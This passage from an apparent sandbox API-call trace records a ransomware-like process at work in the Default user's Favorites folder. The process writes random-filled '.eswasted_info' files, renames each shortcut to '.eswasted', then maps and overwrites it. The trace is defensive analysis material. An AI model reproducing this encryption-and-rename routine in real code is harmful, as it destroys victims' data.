SetEndOfFile (hFile=0x130) returned 1 [0081.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.842] CloseHandle (hObject=0x130) returned 1 [0081.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.846] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.847] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.847] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.847] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0081.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x294) returned 0x71ec18 [0081.847] lstrcpyW (in: lpString1=0x71eca2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.847] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.848] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.848] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.848] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.849] SetEndOfFile (hFile=0x130) returned 1 [0081.850] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.850] lstrcpyW (in: lpString1=0x71eca2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.eswasted")) returned 1 [0081.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.851] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.852] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.853] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.853] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.853] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.853] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.853] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.862] SetEndOfFile (hFile=0x130) returned 1 [0081.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.864] CloseHandle (hObject=0x130) returned 1 [0081.866] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.866] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.867] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.867] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.867] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0081.867] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x71ec18 [0081.867] lstrcpyW (in: lpString1=0x71ec8a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.867] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.867] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.868] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.868] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.870] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.871] SetEndOfFile (hFile=0x130) returned 1 [0081.871] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.871] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.872] lstrcpyW (in: lpString1=0x71ec8a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.eswasted")) returned 1 [0081.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.872] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.873] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.874] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.874] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.874] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.875] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.875] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.883] SetEndOfFile (hFile=0x130) returned 1 [0081.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.885] CloseHandle (hObject=0x130) returned 1 [0081.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.887] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.888] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.888] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.888] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0081.888] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x71ec18 [0081.888] lstrcpyW (in: lpString1=0x71ec9a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.888] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.888] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.890] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.890] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.890] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.891] SetEndOfFile (hFile=0x130) returned 1 [0081.891] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.891] lstrcpyW (in: lpString1=0x71ec9a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.eswasted")) returned 1 [0081.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.893] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.893] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.894] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.894] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.894] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.895] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.895] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.903] SetEndOfFile (hFile=0x130) returned 1 [0081.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.906] CloseHandle (hObject=0x130) returned 1 [0081.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.908] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.908] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.908] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.908] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0081.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x71ec18 [0081.909] lstrcpyW (in: lpString1=0x71ec8a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.909] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.909] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.909] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.909] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.910] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.911] SetEndOfFile (hFile=0x130) returned 1 [0081.911] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.911] lstrcpyW (in: lpString1=0x71ec8a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.eswasted")) returned 1 [0081.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.912] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.912] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.913] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.913] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.913] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.914] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.914] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.929] SetEndOfFile (hFile=0x130) returned 1 [0081.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.931] CloseHandle (hObject=0x130) returned 1 [0081.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.933] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.934] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.934] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.934] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0081.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x71ec18 [0081.934] lstrcpyW (in: lpString1=0x71ec8c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.934] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.935] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.935] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.935] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.936] SetEndOfFile (hFile=0x130) returned 1 [0081.936] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.936] lstrcpyW (in: lpString1=0x71ec8c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.eswasted")) returned 1 [0081.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.998] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.998] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.999] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.999] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.999] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0082.000] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0082.000] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.008] SetEndOfFile (hFile=0x130) returned 1 [0082.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0082.010] CloseHandle (hObject=0x130) returned 1 [0082.012] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0082.012] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0082.013] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0082.013] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.013] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0082.013] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x270) returned 0x71ec18 [0082.013] lstrcpyW (in: lpString1=0x71ec7e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.013] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0082.014] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0082.014] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0082.014] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0082.015] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.016] SetEndOfFile (hFile=0x130) returned 1 [0082.016] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0082.016] lstrcpyW (in: lpString1=0x71ec7e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.eswasted")) returned 1 [0082.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.017] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0082.018] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0082.019] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.019] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.019] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0082.019] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0082.020] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.028] SetEndOfFile (hFile=0x130) returned 1 [0082.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0082.030] CloseHandle (hObject=0x130) returned 1 [0082.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0082.032] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0082.033] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0082.033] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.033] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0082.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x71ec18 [0082.033] lstrcpyW (in: lpString1=0x71ec8c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.033] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 